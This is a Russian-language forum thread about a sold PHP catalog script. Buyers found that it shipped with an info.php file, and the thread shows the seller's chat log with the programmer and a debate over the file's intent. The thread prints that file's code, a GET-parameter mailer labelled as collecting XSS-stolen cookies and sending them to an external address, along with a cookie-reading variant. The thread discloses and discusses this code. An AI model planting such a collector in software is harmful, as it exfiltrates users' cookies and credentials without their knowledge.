Самописный скрипт каталога статей
  • не думаю я что автор сделает толковое и правдивое объяснение
  • Такого мыла не существует.
    Так что можете не беспокоится, и удалить данные строки тоже рекомендуется.
    This is the Postfix program at host (my host).

    I'm sorry to have to inform you that your message could not
    be delivered to one or more recipients. It's attached below.

    For further assistance, please send mail to <postmaster>

    If you do so, please include this problem report. You can
    delete your own text from the attached returned message.

    The Postfix program

    <lala-344-lol@mail.ru>: host mxs.mail.ru[194.67.23.20] said: 550 Message was
        not accepted -- invalid mailbox.  Local mailbox lala-344-lol@mail.ru is
        unavailable: user not found (in reply to end of DATA command)
  • Прочитал то что дал pavelxxx по ссылке.
    Вообщем я немного в растерянности, НО!
    Скрипт писался для меня и использовать его хотел
    только я не более! Честно - САМ НЕ ЗНАЛ что это такое
    и как программер меня подставил (

    В данной ситауции думаю, что стоит всем покупателям скрипта
    изменить емайл в этой строчке и изменить логин и пароль для доступа к админнику...или вообще удалить содержимое этого файла ;)

    ЗЫ: Извиняюсь за предоставленные неудобства ;)
    Cегодня же свяжусь с программером, скажу всё, что о нём
    думаю и заставлю всё исправить! Как только он всё исправит,
    сразу же вышлю всем покупателям исправленный вариант!!!

    ЗЫ: Ещё раз извиняюсь, очень стыдно... (((

    ЗЫ: СКРИП ПОКА СНЯТ С ПРОДАЖИ!!!
  • Такого мыла не существует.
    Так что можете не беспокоится, и удалить данные строки тоже рекомендуется.

    Вот потому я и говорил
    сомневаюсь что автор бы этим воспользовался
  • только что выцепил программера!
    щас буду с ним разговаривать по поводу этого. ;)
  • Итак, сейчас провёл беседу с программером этого скрипта.
    Вот наш лог разговоров:

    Ishutin (14:31:26 28/03/2007)
    привет дима (

    Elion (14:31:40 28/03/2007)
    привет!

    Ishutin (14:33:20 28/03/2007)
    слушай, а ты можешь мне объяснить, что в скрипте делат вот это за код и что он делает
    ? :

    <?
    $q = (isset($_GET['q'])) ? $_GET['q'] : 'itsempty';
    if ($q=="") exit;


    echo $q;

    mail ("lala-344-lol@mail.ru", "Uzer_waz_XSSed!_Eat_his_cookies! ", $q);

    ?>

    Ishutin (14:33:35 28/03/2007)
    ???



    Ishutin (14:34:16 28/03/2007)
    и вообще, зачем этот файл: info.php
    ?????????????????????????????

    Elion (14:34:56 28/03/2007)
    упс.. извини, это мой файл, я его случайно закинул. Удали его от греха по дальше

    Ishutin (14:35:06 28/03/2007)
    такс... не понял....

    Ishutin (14:35:13 28/03/2007)
    у меня есть инфа по этому поводу...

    Ishutin (14:35:28 28/03/2007)
    что эта штука ворует пароли и логины от админки? так?!

    Elion (14:36:41 28/03/2007)
    не совсем, она посылает полученную через $_GET инфу на нужный емэйл

    Ishutin (14:37:04 28/03/2007)
    слушай, а ты знаешь, что этот скрипт сейчас не у одного меня и я подставил тех людей....( что мне им теперь говрить?!

    Ishutin (14:37:12 28/03/2007)
    я в тебе разочаровался... (

    Elion (14:38:05 28/03/2007)
    сама по себе эта вещь не опасная, даже ящика такого не существует, так что ничего страшного не случилось

    Ishutin (14:38:52 28/03/2007)
    и думаю, что скрипт статистики, который я тебе заказывал, я от него откажусь, пока ты его не начал писать, т.к. после такой твоей оплошности моё доверие к тебе упало (

    Ishutin (14:39:07 28/03/2007)
    извини, но сейчас я прав...

    Ishutin (14:39:32 28/03/2007)
    не в очень хорошую ситуацию я попал (((((( как теперь всё это исправить?!

    Elion (14:40:26 28/03/2007)
    кстати, последняя версия каталога лежала в файле catalogv1.zip. Там info.php не было

    Ishutin (14:40:49 28/03/2007)
    ладно вообщем...

    Ishutin (14:41:06 28/03/2007)
    значит сейчас рабочая версия каталога лежит там же?!

    Ishutin (14:41:16 28/03/2007)
    и там всё сдлано без ошибок?!

    Ishutin (14:41:20 28/03/2007)
    точнО!???????

    Elion (14:41:23 28/03/2007)
    этот файл лежит в корне фптшника

    Ishutin (14:41:27 28/03/2007)
    окей

    Elion (14:41:42 28/03/2007)
    да, там то, что работало на e-adman.net

    Ishutin (14:43:42 28/03/2007)
    щас скачаю, проверю... окей. Дим, этот скрипт тоже рабоатет, только вот этот файл info.php очень смущает ((( Ладно вообщем, ты даёшь гарантию, что то что щас лежит на фтп рабочее и не нисёт никакого вреда и никакие логины и пароли никуда не отпарвяться!?

    Elion (14:46:09 28/03/2007)
    да, скрипт в catalogv1.zip полностью рабочий, это последняя версия со всеми исправлениями

    Elion (14:48:36 28/03/2007)
    ничего лишнего там нет. А info.php просто нужен был для тестирования безопасности, с его помошью ничего на сайте взломать нельзя

    Ishutin (14:48:50 28/03/2007)
    понятно.

    Ishutin (14:48:55 28/03/2007)
    ладно, удачи!!!


    Так что вот так... Сейчас скачаю с фтп скрипт, проверю каждый файл
    на наличие такой штуки или что-либо подобное.

    Где-то через минут 40 будет всё готово. ;)

    Всех покупателей скрипта прошу стучать мне в аську 4-285-835 через 40 минут для получение ссылки на скачивание исправленной версии скрипта. ;)

    PS: Ещё раз извиняюсь, за неудобства... Сам неожидал такого хода от программера... (
  • Упс... какие дела...

    Тут прямо - безысходность
  • Только что проверил скрипт, ничего подобного не заметил.
    Закинул архив со скриптом на сервер.
    Сейчас буду простукивать каждого купившего скрипт и давать
    ссылку на его скачивание.

    ЗЫ: Ещё раз извиняюсь за доставленные неудобства, не очень хорошо получилось (

    ЗЫ: Скрипт снова в продаже, принимаю заказы.

    ЗЫ: Так же тех, кто уже приобрёл скрипт, прошу оставить в этой ветке отзывы...
  • Ishutin
    даже не видя скрипта сомневаюсь что с помощью приведенного примера воруются пароли, ну забыл прогаммер заглушку отладочную убрать, чтож теперь не доверять после этого?
  • >>> ну забыл прогаммер заглушку отладочную убрать, чтож теперь не доверять после этого?

    Да потому что из-за этой я бы даже сказал секундной операции(удаление заглушек всяких типо той что была) появиллись не очень приятные последствия как для меня, так и для покупателей скрипта!!!

    Я конечно понимаю, что всё может быть и каждый человек может что-то упустить, забыть и т.д. НО! Этот программер писал мне не один скрипт а несколько - покрупнее и дороже(во много раз)!

    Те скрипты я никому и никогда не продам и знать о них никому не надо кроме меня. Там дорогие и серьёзные скрипты! А если там есть что-либо подобно?! Как вы думаете?! Допустим стартану проект, начну его продвигать, расширять, а тут бац и всё летит к чёрту на куличики...

    Вообщем я ЗА выполнение качественной работы! ;)
  • как ни странно но я тоже ЗА выполнение качественной работы!

    просто в данном случае мне показалось, что обвинения програмера в том что он оставил червячка для кражи паролей, несколько безосновательны.

    косяк налицо, но ведь без злого умысла
  • как ни странно но я тоже ЗА выполнение качественной работы!

    просто в данном случае мне показалось, что обвинения програмера в том что он оставил червячка для кражи паролей, несколько безосновательны.

    косяк налицо, но ведь без злого умысла

    ну если статья это "безосновательное" доказательство тогда ой :)
  • Поверхностно по коду пробежался - вроде неплохой программер :) Читать можно, классы сильно использует, да и не свалено все в одну кучу... Так что зря ты так - ведь файл скорее всего от другого его проекта
  • Поверхностно по коду пробежался - вроде неплохой программер :) Читать можно, классы сильно использует, да и не свалено все в одну кучу... Так что зря ты так - ведь файл скорее всего от другого его проекта

    да я вообще не покупал скрипт :) просто код в аське показали, потом ввел мыло в гугл и всё :))) тем более если файл от другого проекта то это еще хуже :)
  • Ребята, вам что - крыши посносило?
    Покажите, где именно вы там увидели куки. Или не наезжайте на человека из-за скрипта, который вообще не в состоянии чем-либо навредить.
  • Если нужен пример, я сделал так - AllArticle.RU
  • Злосчастный скрипт может отсылать на этот мейл параметр, введенный при запуске:
    _http://domain.tld/info.php?q=blablabla
    ...и отошлет он в теле письма строчку blablabla. И где здесь куки? Упоминаются в заголовке письма? - это еще ничего не значит. Другое дело, если бы там висело что-то вроде:
    Код
    <?
    $q = (isset($_COOKIE['q'])) ? $_COOKIE['q'] : 'itsempty';
    if (empty($q)) exit;

    //пропускаю необходимое действие - вооружать ламеров ни к чему!!!

    mail ("lala-344-lol@mail.ru", "Uzer_waz_XSSed!_Eat_his_cookies! :)", $q);

    ?>

Привет, незнакомец!

Похоже, Вы новенький! Чтобы начать обсуждение, кликните на одну из кнопок ниже ;)

Войти с помощью OpenID

Категории

В этой теме: